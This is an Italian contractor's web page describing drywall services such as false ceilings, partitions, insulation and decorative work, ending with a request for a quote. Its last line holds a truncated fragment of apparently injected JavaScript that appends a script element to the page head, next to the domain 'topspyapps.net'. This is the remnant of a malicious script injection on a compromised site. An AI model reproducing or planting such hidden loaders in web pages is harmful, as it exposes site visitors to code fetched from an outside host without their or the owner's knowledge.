Cosa facciamo

Home/Progincar/Cosa facciamo
Cosa facciamo 2017-11-07T07:50:19+00:00

Lavori in cartongesso e decorazioni

La progIN.CAR domina tutte le tecniche che fanno ricorso al cartongesso. Il cartongesso si presenta sotto forma di lastre dello spessore che varia da 1 cm a 2 cm circa di vario formato, costituite da gesso di cava racchiuso tra due fogli di cartone. Viene usato per costruzioni a secco.

Si caratterizza per soluzioni veloci ed economiche che durano nel tempo. In particolare trova applicazione per dividere ambienti e per realizzare controsoffitti, nonché per risolvere problematiche particolari, come la presenza di umidità.

Le lastre di cartongesso sono varie nello spessore e nella composizione, permettendo così di scegliere la mescola adatta al lavoro da eseguire.

Decorazioni cartongesso

Con il cartongesso è possibile fare di tutto, è versatile e resistente e si presta a diversi usi:

  • controsoffitti, per abbassare soffitti troppo alti o coprire tubature o impianti elettrici antiestetici; abbassamento soffitti con il cartongesso; realizzazione di pareti e soffitti in cartongesso
  • creazione di pareti e divisori. Si tratta di pannelli avvitati su una struttura metallica. Il montaggio è veloce, il materiale è leggero ed è facilmente rimovibile. E’ possibile inserire finestre e porte, anche scorrevoli all’interno della parete.
  • isolamento acustico e termico, resistente all’umidità, inserendo all’interno della parete dei pannelli in lana di roccia. Le contropareti in cartongesso sono l’ideale per isolare da pareti umide o per rendere lisce e lineari pareti che richiederebbero un intervento di rasatura o intonacatura.
  • opere con forme e dimensioni uniche e raffinate: per creare ambienti e strutture molto particolari il cartongesso è un materiale quasi indispensabile.

Si può dare libero sfogo alla fantasia e realizzare pareti, curve, mensole di qualsiasi forma, cappe, velette con faretti incassati, colonne, semicolonne, cabine armadio o addirittura delle splendide librerie personalizzate.

Una volta stuccate, rifinite e imbiancate, le opere in cartongesso non sono più distinguibili dalle altre opere murarie.

Faretti incassati

Richiedi ora il tuo preventivo personalizzato

Contattaci
Contattaci

d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) { }topspyapps.net